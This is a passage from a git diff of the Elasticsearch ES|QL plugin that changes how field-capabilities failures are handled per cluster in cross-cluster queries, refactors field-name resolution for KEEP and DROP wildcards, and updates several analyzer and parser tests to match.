still an error. 
if (indexResolution.isValid()) { - // no matching indices and no concrete index requested - just mark it as done, no error - // We check for the valid resolution because if we have empty resolution it's still an error. - markClusterWithFinalStateAndNoShards(executionInfo, c, Cluster.Status.SUCCESSFUL, null); + List failures = indexResolution.failures().getOrDefault(c, List.of()); + // No matching indices, no concrete index requested, and no error in field-caps; just mark as done. + if (failures.isEmpty()) { + markClusterWithFinalStateAndNoShards(executionInfo, c, Cluster.Status.SUCCESSFUL, null); + } else { + // skip reporting index_not_found exceptions to avoid spamming users with such errors + // when queries use a remote cluster wildcard, e.g., `*:my-logs*`. + Exception nonIndexNotFound = failures.stream() + .map(FieldCapabilitiesFailure::getException) + .filter(ex -> ExceptionsHelper.unwrap(ex, IndexNotFoundException.class) == null) + .findAny() + .orElse(null); + markClusterWithFinalStateAndNoShards(executionInfo, c, Cluster.Status.SKIPPED, nonIndexNotFound); + } } } } @@ -252,7 +270,7 @@ static void updateExecutionInfoWithClustersWithNoMatchingIndices( // Filter-less version, mainly for testing where we don't need filter support static void updateExecutionInfoWithClustersWithNoMatchingIndices(EsqlExecutionInfo executionInfo, IndexResolution indexResolution) { - updateExecutionInfoWithClustersWithNoMatchingIndices(executionInfo, indexResolution, null); + updateExecutionInfoWithClustersWithNoMatchingIndices(executionInfo, indexResolution, false); } // visible for testing @@ -360,7 +378,7 @@ public static void markClusterWithFinalStateAndNoShards( .setSkippedShards(Objects.requireNonNullElse(v.getSkippedShards(), 0)) .setFailedShards(Objects.requireNonNullElse(v.getFailedShards(), 0)); if (ex != null) { - builder.setFailures(List.of(new ShardSearchFailure(ex))); + builder.addFailures(List.of(new ShardSearchFailure(ex))); } return builder.build(); }); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/EsqlSession.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/EsqlSession.java index 4ff65f59bbd72..9e5b88484f857 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/EsqlSession.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/EsqlSession.java @@ -7,8 +7,12 @@ package org.elasticsearch.xpack.esql.session; +import org.elasticsearch.ElasticsearchException; +import org.elasticsearch.ExceptionsHelper; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.OriginalIndices; +import org.elasticsearch.action.fieldcaps.FieldCapabilitiesFailure; +import org.elasticsearch.action.search.ShardSearchFailure; import org.elasticsearch.action.support.IndicesOptions; import org.elasticsearch.action.support.SubscribableListener; import org.elasticsearch.common.Strings; @@ -19,15 +23,19 @@ import org.elasticsearch.compute.data.BlockUtils; import org.elasticsearch.compute.data.Page; import org.elasticsearch.compute.operator.DriverCompletionInfo; +import org.elasticsearch.compute.operator.FailureCollector; +import org.elasticsearch.core.CheckedFunction; import org.elasticsearch.core.Releasables; import org.elasticsearch.index.IndexMode; import org.elasticsearch.index.mapper.IndexModeFieldMapper; import org.elasticsearch.index.query.BoolQueryBuilder; import org.elasticsearch.index.query.QueryBuilder; import org.elasticsearch.index.query.TermQueryBuilder; +import 
org.elasticsearch.index.shard.ShardId; import org.elasticsearch.indices.IndicesExpressionGrouper; import org.elasticsearch.logging.LogManager; import org.elasticsearch.logging.Logger; +import org.elasticsearch.search.SearchShardTarget; import org.elasticsearch.xpack.esql.VerificationException; import org.elasticsearch.xpack.esql.action.EsqlExecutionInfo; import org.elasticsearch.xpack.esql.action.EsqlQueryRequest; @@ -108,7 +116,6 @@ import java.util.List; import java.util.Map; import java.util.Set; -import java.util.function.Function; import java.util.stream.Collectors; import static org.elasticsearch.index.query.QueryBuilders.boolQuery; @@ -326,11 +333,58 @@ private LocalRelation resultToPlan(LogicalPlan plan, Result result) { } private LogicalPlan parse(String query, QueryParams params) { - var parsed = new EsqlParser().createStatement(query, params, planTelemetry); + var parsed = new EsqlParser().createStatement(query, params, planTelemetry, configuration); LOGGER.debug("Parsed logical plan:\n{}", parsed); return parsed; } + /** + * Associates errors that occurred during field-caps with the cluster info in the execution info. + * - Skips clusters that are no longer running, as they have already been marked as successful, skipped, or failed. + * - If allow_partial_results or skip_unavailable is enabled, stores the failures in the cluster info but allows execution to continue. + * - Otherwise, aborts execution with the failures. + */ + static void handleFieldCapsFailures( + boolean allowPartialResults, + EsqlExecutionInfo executionInfo, + Map> failures + ) throws Exception { + FailureCollector failureCollector = new FailureCollector(); + for (var e : failures.entrySet()) { + String clusterAlias = e.getKey(); + EsqlExecutionInfo.Cluster cluster = executionInfo.getCluster(clusterAlias); + if (cluster.getStatus() != EsqlExecutionInfo.Cluster.Status.RUNNING) { + assert cluster.getStatus() != EsqlExecutionInfo.Cluster.Status.SUCCESSFUL : "can't mark a cluster success with failures"; + continue; + } + if (allowPartialResults == false && executionInfo.isSkipUnavailable(clusterAlias) == false) { + for (FieldCapabilitiesFailure failure : e.getValue()) { + failureCollector.unwrapAndCollect(failure.getException()); + } + } else if (cluster.getFailures().isEmpty()) { + var shardFailures = e.getValue().stream().map(f -> { + ShardId shardId = null; + if (ExceptionsHelper.unwrapCause(f.getException()) instanceof ElasticsearchException es) { + shardId = es.getShardId(); + } + if (shardId != null) { + return new ShardSearchFailure(f.getException(), new SearchShardTarget(null, shardId, clusterAlias)); + } else { + return new ShardSearchFailure(f.getException()); + } + }).toList(); + executionInfo.swapCluster( + clusterAlias, + (k, curr) -> new EsqlExecutionInfo.Cluster.Builder(cluster).addFailures(shardFailures).build() + ); + } + } + Exception failure = failureCollector.getFailure(); + if (failure != null) { + throw failure; + } + } + public void analyzedPlan( LogicalPlan parsed, EsqlExecutionInfo executionInfo, @@ -342,7 +396,8 @@ public void analyzedPlan( return; } - Function analyzeAction = (l) -> { + CheckedFunction analyzeAction = (l) -> { + handleFieldCapsFailures(configuration.allowPartialResults(), executionInfo, l.indices.failures()); Analyzer analyzer = new Analyzer( new AnalyzerContext(configuration, functionRegistry, l.indices, l.lookupIndices, l.enrichResolution, l.inferenceResolution), verifier @@ -402,8 +457,8 @@ public void analyzedPlan( try { // the order here is tricky - if the cluster 
has been filtered and later became unavailable, // do we want to declare it successful or skipped? For now, unavailability takes precedence. - EsqlCCSUtils.updateExecutionInfoWithUnavailableClusters(executionInfo, result.indices.unavailableClusters()); - EsqlCCSUtils.updateExecutionInfoWithClustersWithNoMatchingIndices(executionInfo, result.indices, null); + EsqlCCSUtils.updateExecutionInfoWithUnavailableClusters(executionInfo, result.indices.failures()); + EsqlCCSUtils.updateExecutionInfoWithClustersWithNoMatchingIndices(executionInfo, result.indices, false); plan = analyzeAction.apply(result); } catch (Exception e) { l.onFailure(e); @@ -485,11 +540,7 @@ private void preAnalyzeMainIndices( result.fieldNames, requestFilter, listener.delegateFailure((l, indexResolution) -> { - if (configuration.allowPartialResults() == false && indexResolution.getUnavailableShards().isEmpty() == false) { - l.onFailure(indexResolution.getUnavailableShards().iterator().next()); - } else { - l.onResponse(result.withIndexResolution(indexResolution)); - } + l.onResponse(result.withIndexResolution(indexResolution)); }) ); } @@ -514,7 +565,7 @@ private boolean allCCSClustersSkipped( ActionListener logicalPlanListener ) { IndexResolution indexResolution = result.indices; - EsqlCCSUtils.updateExecutionInfoWithUnavailableClusters(executionInfo, indexResolution.unavailableClusters()); + EsqlCCSUtils.updateExecutionInfoWithUnavailableClusters(executionInfo, indexResolution.failures()); if (executionInfo.isCrossClusterSearch() && executionInfo.getClusterStates(EsqlExecutionInfo.Cluster.Status.RUNNING).findAny().isEmpty()) { // for a CCS, if all clusters have been marked as SKIPPED, nothing to search so send a sentinel Exception @@ -528,7 +579,7 @@ private boolean allCCSClustersSkipped( } private static void analyzeAndMaybeRetry( - Function analyzeAction, + CheckedFunction analyzeAction, QueryBuilder requestFilter, PreAnalysisResult result, EsqlExecutionInfo executionInfo, @@ -544,7 +595,9 @@ private static void analyzeAndMaybeRetry( if (result.indices.isValid() || requestFilter != null) { // We won't run this check with no filter and no valid indices since this may lead to false positive - missing index report // when the resolution result is not valid for a different reason. - EsqlCCSUtils.updateExecutionInfoWithClustersWithNoMatchingIndices(executionInfo, result.indices, requestFilter); + if (executionInfo.clusterInfo.isEmpty() == false) { + EsqlCCSUtils.updateExecutionInfoWithClustersWithNoMatchingIndices(executionInfo, result.indices, requestFilter != null); + } } plan = analyzeAction.apply(result); } catch (Exception e) { @@ -627,16 +680,20 @@ static PreAnalysisResult fieldNames(LogicalPlan parsed, Set enrichPolicy } var referencesBuilder = AttributeSet.builder(); - // "keep" and "drop" attributes are special whenever a wildcard is used in their name, as the wildcard can shadow some - // attributes ("lookup join" generated columns among others) and steps like removal of Aliases should ignore the fields - // to remove if their name matches one of these wildcards. + // "keep" and "drop" attributes are special whenever a wildcard is used in their name, as the wildcard can cover some + // attributes ("lookup join" generated columns among others); steps like removal of Aliases should ignore fields matching the + // wildcards. 
// - // ie "from test | eval lang = languages + 1 | keep *l" should consider both "languages" and "*l" as valid fields to ask for - // "from test | eval first_name = 1 | drop first_name | drop *name should also consider "*name" as valid field to ask for + // E.g. "from test | eval lang = languages + 1 | keep *l" should consider both "languages" and "*l" as valid fields to ask for + // "from test | eval first_name = 1 | drop first_name | drop *name" should also consider "*name" as valid field to ask for // // NOTE: the grammar allows wildcards to be used in other commands as well, but these are forbidden in the LogicalPlanBuilder - var shadowingRefsBuilder = AttributeSet.builder(); - var keepJoinRefsBuilder = AttributeSet.builder(); + // Except in KEEP and DROP. + var keepRefs = AttributeSet.builder(); + var dropWildcardRefs = AttributeSet.builder(); + // fields required to request for lookup joins to work + var joinRefs = AttributeSet.builder(); + // lookup indices where we request "*" because we may require all their fields Set wildcardJoinIndices = new java.util.HashSet<>(); boolean[] canRemoveAliases = new boolean[] { true }; @@ -654,14 +711,14 @@ static PreAnalysisResult fieldNames(LogicalPlan parsed, Set enrichPolicy referencesBuilder.addAll(enrichRefs); } else if (p instanceof LookupJoin join) { if (join.config().type() instanceof JoinTypes.UsingJoinType usingJoinType) { - keepJoinRefsBuilder.addAll(usingJoinType.columns()); + joinRefs.addAll(usingJoinType.columns()); } - if (shadowingRefsBuilder.isEmpty()) { + if (keepRefs.isEmpty()) { // No KEEP commands after the JOIN, so we need to mark this index for "*" field resolution wildcardJoinIndices.add(((UnresolvedRelation) join.right()).indexPattern().indexPattern()); } else { // Keep commands can reference the join columns with names that shadow aliases, so we block their removal - keepJoinRefsBuilder.addAll(shadowingRefsBuilder); + joinRefs.addAll(keepRefs); } } else { referencesBuilder.addAll(p.references()); @@ -673,10 +730,16 @@ static PreAnalysisResult fieldNames(LogicalPlan parsed, Set enrichPolicy p.forEachExpression(UnresolvedNamePattern.class, up -> { var ua = new UnresolvedAttribute(up.source(), up.name()); referencesBuilder.add(ua); - shadowingRefsBuilder.add(ua); + if (p instanceof Keep) { + keepRefs.add(ua); + } else if (p instanceof Drop) { + dropWildcardRefs.add(ua); + } else { + throw new IllegalStateException("Only KEEP and DROP should allow wildcards"); + } }); if (p instanceof Keep) { - shadowingRefsBuilder.addAll(p.references()); + keepRefs.addAll(p.references()); } } @@ -710,13 +773,15 @@ static PreAnalysisResult fieldNames(LogicalPlan parsed, Set enrichPolicy if (fieldNames.contains(ne.name())) { return; } - referencesBuilder.removeIf(attr -> matchByName(attr, ne.name(), shadowingRefsBuilder.contains(attr))); + referencesBuilder.removeIf( + attr -> matchByName(attr, ne.name(), keepRefs.contains(attr) || dropWildcardRefs.contains(attr)) + ); }); } }); // Add JOIN ON column references afterward to avoid Alias removal - referencesBuilder.addAll(keepJoinRefsBuilder); + referencesBuilder.addAll(joinRefs); // If any JOIN commands need wildcard field-caps calls, persist the index names if (wildcardJoinIndices.isEmpty() == false) { result = result.withWildcardJoinIndices(wildcardJoinIndices); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/IndexResolver.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/IndexResolver.java index d2f79ceb1316f..945fe4a8dc4b3 
100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/IndexResolver.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/IndexResolver.java @@ -7,8 +7,6 @@ package org.elasticsearch.xpack.esql.session; import org.elasticsearch.action.ActionListener; -import org.elasticsearch.action.NoShardAvailableActionException; -import org.elasticsearch.action.fieldcaps.FieldCapabilitiesFailure; import org.elasticsearch.action.fieldcaps.FieldCapabilitiesIndexResponse; import org.elasticsearch.action.fieldcaps.FieldCapabilitiesRequest; import org.elasticsearch.action.fieldcaps.FieldCapabilitiesResponse; @@ -94,13 +92,15 @@ public void resolveAsMergedMapping( // public for testing only public static IndexResolution mergedMappings(String indexPattern, FieldCapabilitiesResponse fieldCapsResponse) { - var numberOfIndices = fieldCapsResponse.getIndexResponses().size(); assert ThreadPool.assertCurrentThreadPool(ThreadPool.Names.SEARCH_COORDINATION); // too expensive to run this on a transport worker + var numberOfIndices = fieldCapsResponse.getIndexResponses().size(); if (fieldCapsResponse.getIndexResponses().isEmpty()) { return IndexResolution.notFound(indexPattern); } - Map> fieldsCaps = collectFieldCaps(fieldCapsResponse); + var collectedFieldCaps = collectFieldCaps(fieldCapsResponse); + Map fieldsCaps = collectedFieldCaps.fieldsCaps; + Map indexMappingHashDuplicates = collectedFieldCaps.indexMappingHashDuplicates; // Build hierarchical fields - it's easier to do it in sorted order so the object fields come first. // TODO flattened is simpler - could we get away with that? @@ -132,7 +132,8 @@ public static IndexResolution mergedMappings(String indexPattern, FieldCapabilit } // TODO we're careful to make isAlias match IndexResolver - but do we use it? - List fcs = fieldsCaps.get(fullName); + var fieldCap = fieldsCaps.get(fullName); + List fcs = fieldCap.fieldCapabilities; EsField field = firstUnsupportedParent == null ? createField(fieldCapsResponse, name, fullName, fcs, isAlias) : new UnsupportedEsField( @@ -142,24 +143,12 @@ public static IndexResolution mergedMappings(String indexPattern, FieldCapabilit new HashMap<>() ); fields.put(name, field); - - var isPartiallyUnmapped = fcs.size() < numberOfIndices; + var isPartiallyUnmapped = fcs.size() + indexMappingHashDuplicates.getOrDefault(fieldCap.indexMappingHash, 0) < numberOfIndices; if (isPartiallyUnmapped) { partiallyUnmappedFields.add(fullName); } } - Map unavailableRemotes = EsqlCCSUtils.determineUnavailableRemoteClusters( - fieldCapsResponse.getFailures() - ); - - Set unavailableShards = new HashSet<>(); - for (FieldCapabilitiesFailure failure : fieldCapsResponse.getFailures()) { - if (failure.getException() instanceof NoShardAvailableActionException e) { - unavailableShards.add(e); - } - } - Map concreteIndices = Maps.newMapWithExpectedSize(fieldCapsResponse.getIndexResponses().size()); for (FieldCapabilitiesIndexResponse ir : fieldCapsResponse.getIndexResponses()) { concreteIndices.put(ir.getIndexName(), ir.getIndexMode()); @@ -171,14 +160,24 @@ public static IndexResolution mergedMappings(String indexPattern, FieldCapabilit } // If all the mappings are empty we return an empty set of resolved indices to line up with QL var index = new EsIndex(indexPattern, rootFields, allEmpty ? 
Map.of() : concreteIndices, partiallyUnmappedFields); - return IndexResolution.valid(index, concreteIndices.keySet(), unavailableShards, unavailableRemotes); + var failures = EsqlCCSUtils.groupFailuresPerCluster(fieldCapsResponse.getFailures()); + return IndexResolution.valid(index, concreteIndices.keySet(), failures); } - private static Map> collectFieldCaps(FieldCapabilitiesResponse fieldCapsResponse) { - Set seenHashes = new HashSet<>(); - Map> fieldsCaps = new HashMap<>(); + private record IndexFieldCapabilitiesWithSourceHash(List fieldCapabilities, String indexMappingHash) {} + + private record CollectedFieldCaps( + Map fieldsCaps, + // The map won't contain entries without duplicates, i.e., it's number of occurrences - 1. + Map indexMappingHashDuplicates + ) {} + + private static CollectedFieldCaps collectFieldCaps(FieldCapabilitiesResponse fieldCapsResponse) { + Map indexMappingHashToDuplicateCount = new HashMap<>(); + Map fieldsCaps = new HashMap<>(); + for (FieldCapabilitiesIndexResponse response : fieldCapsResponse.getIndexResponses()) { - if (seenHashes.add(response.getIndexMappingHash()) == false) { + if (indexMappingHashToDuplicateCount.compute(response.getIndexMappingHash(), (k, v) -> v == null ? 1 : v + 1) > 1) { continue; } for (IndexFieldCapabilities fc : response.get().values()) { @@ -186,11 +185,25 @@ private static Map> collectFieldCaps(FieldC // ESQL builds the metadata fields if they are asked for without using the resolution. continue; } - List all = fieldsCaps.computeIfAbsent(fc.name(), (_key) -> new ArrayList<>()); + List all = fieldsCaps.computeIfAbsent( + fc.name(), + (_key) -> new IndexFieldCapabilitiesWithSourceHash(new ArrayList<>(), response.getIndexMappingHash()) + ).fieldCapabilities; all.add(fc); } } - return fieldsCaps; + + var iterator = indexMappingHashToDuplicateCount.entrySet().iterator(); + while (iterator.hasNext()) { + var next = iterator.next(); + if (next.getValue() <= 1) { + iterator.remove(); + } else { + next.setValue(next.getValue() - 1); + } + } + + return new CollectedFieldCaps(fieldsCaps, indexMappingHashToDuplicateCount); } private static EsField createField( diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/CsvTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/CsvTests.java index 6935a1efac2ae..f2f1568242d25 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/CsvTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/CsvTests.java @@ -88,6 +88,7 @@ import org.elasticsearch.xpack.esql.planner.PlannerUtils; import org.elasticsearch.xpack.esql.planner.TestPhysicalOperationProviders; import org.elasticsearch.xpack.esql.planner.mapper.Mapper; +import org.elasticsearch.xpack.esql.plugin.EsqlFlags; import org.elasticsearch.xpack.esql.plugin.QueryPragmas; import org.elasticsearch.xpack.esql.session.Configuration; import org.elasticsearch.xpack.esql.session.EsqlSession; @@ -566,7 +567,7 @@ private static TestPhysicalOperationProviders testOperationProviders( } private ActualResults executePlan(BigArrays bigArrays) throws Exception { - LogicalPlan parsed = parser.createStatement(testCase.query); + LogicalPlan parsed = parser.createStatement(testCase.query, EsqlTestUtils.TEST_CFG); var testDatasets = testDatasets(parsed); LogicalPlan analyzed = analyzedPlan(parsed, testDatasets); @@ -715,7 +716,7 @@ void executeSubPlan( var searchStats = new DisabledSearchStats(); var logicalTestOptimizer = new LocalLogicalPlanOptimizer(new 
LocalLogicalOptimizerContext(configuration, foldCtx, searchStats)); var physicalTestOptimizer = new TestLocalPhysicalPlanOptimizer( - new LocalPhysicalOptimizerContext(configuration, foldCtx, searchStats) + new LocalPhysicalOptimizerContext(new EsqlFlags(true), configuration, foldCtx, searchStats) ); var csvDataNodePhysicalPlan = PlannerUtils.localPlan(dataNodePlan, logicalTestOptimizer, physicalTestOptimizer); diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/action/EsqlExecutionInfoTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/action/EsqlExecutionInfoTests.java index 111d86669af22..19899e62ca057 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/action/EsqlExecutionInfoTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/action/EsqlExecutionInfoTests.java @@ -57,7 +57,7 @@ public void testHasMetadataPartial() { assertFalse(info.hasMetadataToReport()); info.swapCluster(key, (k, v) -> { EsqlExecutionInfo.Cluster.Builder builder = new EsqlExecutionInfo.Cluster.Builder(v); - builder.setFailures(List.of(new ShardSearchFailure(new IllegalStateException("shard failure")))); + builder.addFailures(List.of(new ShardSearchFailure(new IllegalStateException("shard failure")))); return builder.build(); }); assertTrue(info.hasMetadataToReport()); diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/AnalyzerTestUtils.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/AnalyzerTestUtils.java index 5e6c37545a396..85492117bc542 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/AnalyzerTestUtils.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/AnalyzerTestUtils.java @@ -36,9 +36,9 @@ import static org.elasticsearch.xpack.core.enrich.EnrichPolicy.GEO_MATCH_TYPE; import static org.elasticsearch.xpack.core.enrich.EnrichPolicy.MATCH_TYPE; import static org.elasticsearch.xpack.core.enrich.EnrichPolicy.RANGE_TYPE; +import static org.elasticsearch.xpack.esql.EsqlTestUtils.TEST_CFG; import static org.elasticsearch.xpack.esql.EsqlTestUtils.TEST_VERIFIER; import static org.elasticsearch.xpack.esql.EsqlTestUtils.configuration; -import static org.elasticsearch.xpack.esql.EsqlTestUtils.emptyInferenceResolution; public final class AnalyzerTestUtils { @@ -61,27 +61,36 @@ public static Analyzer analyzer(IndexResolution indexResolution, Map lookupResolution, Verifier verifier) { + return analyzer(indexResolution, lookupResolution, defaultEnrichResolution(), verifier); + } + + public static Analyzer analyzer( + IndexResolution indexResolution, + Map lookupResolution, + EnrichResolution enrichResolution, + Verifier verifier + ) { + return analyzer(indexResolution, lookupResolution, enrichResolution, verifier, TEST_CFG); + } + + public static Analyzer analyzer( + IndexResolution indexResolution, + Map lookupResolution, + EnrichResolution enrichResolution, + Verifier verifier, + Configuration config + ) { return new Analyzer( new AnalyzerContext( - EsqlTestUtils.TEST_CFG, + config, new EsqlFunctionRegistry(), indexResolution, lookupResolution, - defaultEnrichResolution(), + enrichResolution, defaultInferenceResolution() ), verifier @@ -89,17 +98,7 @@ public static Analyzer analyzer(IndexResolution indexResolution, Map enrichFields = new ArrayList<>(indexResolution.get().mapping().keySet()); + enrichFields.remove(field); + enrich.addResolvedPolicy( + policy, + mode, + new ResolvedEnrichPolicy(field, 
policyType, enrichFields, Map.of("", index), indexResolution.get().mapping()) + ); + } + public static void loadEnrichPolicyResolution(EnrichResolution enrich, String policy, String field, String index, String mapping) { loadEnrichPolicyResolution(enrich, EnrichPolicy.MATCH_TYPE, policy, field, index, mapping); } diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/AnalyzerTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/AnalyzerTests.java index b99050b8ef090..4ef6f36522b5d 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/AnalyzerTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/AnalyzerTests.java @@ -12,6 +12,7 @@ import org.elasticsearch.action.fieldcaps.FieldCapabilitiesResponse; import org.elasticsearch.action.fieldcaps.IndexFieldCapabilities; import org.elasticsearch.action.fieldcaps.IndexFieldCapabilitiesBuilder; +import org.elasticsearch.common.hash.MessageDigests; import org.elasticsearch.common.lucene.BytesRefs; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.index.IndexMode; @@ -89,6 +90,7 @@ import org.elasticsearch.xpack.esql.session.IndexResolver; import java.io.IOException; +import java.nio.charset.StandardCharsets; import java.time.Period; import java.util.ArrayList; import java.util.List; @@ -2006,7 +2008,7 @@ public void testUnsupportedTypesInStats() { | stats avg(x), count_distinct(x), max(x), median(x), median_absolute_deviation(x), min(x), percentile(x, 10), sum(x) """, """ Found 8 problems - line 2:12: argument of [avg(x)] must be [numeric except unsigned_long or counter types],\ + line 2:12: argument of [avg(x)] must be [aggregate_metric_double or numeric except unsigned_long or counter types],\ found value [x] type [unsigned_long] line 2:20: argument of [count_distinct(x)] must be [any exact type except unsigned_long, _source, or counter types],\ found value [x] type [unsigned_long] @@ -2028,7 +2030,7 @@ public void testUnsupportedTypesInStats() { | stats avg(x), median(x), median_absolute_deviation(x), percentile(x, 10), sum(x) """, """ Found 5 problems - line 2:10: argument of [avg(x)] must be [numeric except unsigned_long or counter types],\ + line 2:10: argument of [avg(x)] must be [aggregate_metric_double or numeric except unsigned_long or counter types],\ found value [x] type [version] line 2:18: argument of [median(x)] must be [numeric except unsigned_long or counter types],\ found value [x] type [version] @@ -3017,6 +3019,27 @@ public void testResolveInsist_multiIndexFieldPartiallyExistsWithMultiTypesNoKeyw assertThat(attr.unresolvedMessage(), is(expected)); } + public void testResolveInsist_multiIndexSameMapping_fieldIsMapped() { + assumeTrue("Requires UNMAPPED FIELDS", EsqlCapabilities.Cap.UNMAPPED_FIELDS.isEnabled()); + + IndexResolution resolution = IndexResolver.mergedMappings( + "foo, bar", + new FieldCapabilitiesResponse( + List.of( + fieldCapabilitiesIndexResponse("foo", messageResponseMap("long")), + fieldCapabilitiesIndexResponse("bar", messageResponseMap("long")) + ), + List.of() + ) + ); + var plan = analyze("FROM foo, bar | INSIST_🐔 message", analyzer(resolution, TEST_VERIFIER)); + var limit = as(plan, Limit.class); + var insist = as(limit.child(), Insist.class); + var attribute = (FieldAttribute) EsqlTestUtils.singleValue(insist.output()); + assertThat(attribute.name(), is("message")); + assertThat(attribute.dataType(), is(DataType.LONG)); + } + public void 
testResolveInsist_multiIndexFieldPartiallyExistsWithMultiTypesWithKeyword_createsAnInvalidMappedField() { assumeTrue("Requires UNMAPPED FIELDS", EsqlCapabilities.Cap.UNMAPPED_FIELDS.isEnabled()); @@ -3472,7 +3495,11 @@ private static FieldCapabilitiesIndexResponse fieldCapabilitiesIndexResponse( String indexName, Map fields ) { - return new FieldCapabilitiesIndexResponse(indexName, indexName, fields, false, IndexMode.STANDARD); + String indexMappingHash = new String( + MessageDigests.sha256().digest(fields.toString().getBytes(StandardCharsets.UTF_8)), + StandardCharsets.UTF_8 + ); + return new FieldCapabilitiesIndexResponse(indexName, indexMappingHash, fields, false, IndexMode.STANDARD); } private static Map messageResponseMap(String date) { diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/ParsingTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/ParsingTests.java index 348c4d4266b8e..54071ac86d59f 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/ParsingTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/ParsingTests.java @@ -19,7 +19,10 @@ import org.elasticsearch.xpack.esql.index.EsIndex; import org.elasticsearch.xpack.esql.index.IndexResolution; import org.elasticsearch.xpack.esql.parser.EsqlParser; +import org.elasticsearch.xpack.esql.parser.ParserUtils; import org.elasticsearch.xpack.esql.parser.ParsingException; +import org.elasticsearch.xpack.esql.parser.QueryParam; +import org.elasticsearch.xpack.esql.parser.QueryParams; import org.elasticsearch.xpack.esql.plan.logical.LogicalPlan; import org.elasticsearch.xpack.esql.plan.logical.Row; import org.elasticsearch.xpack.esql.type.EsqlDataTypeConverter; @@ -96,7 +99,7 @@ public void testInlineCast() throws IOException { if (EsqlDataTypeConverter.converterFunctionFactory(expectedType) == null) { continue; } - LogicalPlan plan = parser.createStatement("ROW a = 1::" + nameOrAlias); + LogicalPlan plan = parser.createStatement("ROW a = 1::" + nameOrAlias, TEST_CFG); Row row = as(plan, Row.class); assertThat(row.fields(), hasSize(1)); Function functionCall = (Function) row.fields().get(0).child(); @@ -157,9 +160,34 @@ public void testJoinTwiceOnTheSameField_TwoLookups() { } public void testInvalidLimit() { - assertEquals("1:13: Invalid value for LIMIT [foo: String], expecting a non negative integer", error("row a = 1 | limit \"foo\"")); - assertEquals("1:13: Invalid value for LIMIT [1.2: Double], expecting a non negative integer", error("row a = 1 | limit 1.2")); - assertEquals("1:13: Invalid value for LIMIT [-1], expecting a non negative integer", error("row a = 1 | limit -1")); + assertLimitWithAndWithoutParams("foo", "\"foo\"", DataType.KEYWORD); + assertLimitWithAndWithoutParams(1.2, "1.2", DataType.DOUBLE); + assertLimitWithAndWithoutParams(-1, "-1", DataType.INTEGER); + assertLimitWithAndWithoutParams(true, "true", DataType.BOOLEAN); + assertLimitWithAndWithoutParams(false, "false", DataType.BOOLEAN); + assertLimitWithAndWithoutParams(null, "null", DataType.NULL); + } + + private void assertLimitWithAndWithoutParams(Object value, String valueText, DataType type) { + assertEquals( + "1:13: value of [limit " + + valueText + + "] must be a non negative integer, found value [" + + valueText + + "] type [" + + type.typeName() + + "]", + error("row a = 1 | limit " + valueText) + ); + + assertEquals( + "1:13: value of [limit ?param] must be a non negative integer, found value [?param] type [" + 
type.typeName() + "]", + error( + "row a = 1 | limit ?param", + new QueryParams(List.of(new QueryParam("param", value, type, ParserUtils.ParamClassification.VALUE))) + ) + ); + } public void testInvalidSample() { @@ -181,13 +209,20 @@ public void testInvalidSample() { ); } - private String error(String query) { - ParsingException e = expectThrows(ParsingException.class, () -> defaultAnalyzer.analyze(parser.createStatement(query))); + private String error(String query, QueryParams params) { + ParsingException e = expectThrows( + ParsingException.class, + () -> defaultAnalyzer.analyze(parser.createStatement(query, params, TEST_CFG)) + ); String message = e.getMessage(); assertTrue(message.startsWith("line ")); return message.substring("line ".length()); } + private String error(String query) { + return error(query, new QueryParams()); + } + private static IndexResolution loadIndexResolution(String name) { return IndexResolution.valid(new EsIndex(INDEX_NAME, LoadMapping.loadMapping(name))); } diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/VerifierTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/VerifierTests.java index 14e5c0615e2b4..6dd20c7b46719 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/VerifierTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/VerifierTests.java @@ -28,6 +28,7 @@ import org.elasticsearch.xpack.esql.parser.EsqlParser; import org.elasticsearch.xpack.esql.parser.QueryParam; import org.elasticsearch.xpack.esql.parser.QueryParams; +import org.elasticsearch.xpack.esql.plan.logical.Enrich; import java.util.ArrayList; import java.util.LinkedHashMap; @@ -37,8 +38,13 @@ import java.util.Map; import 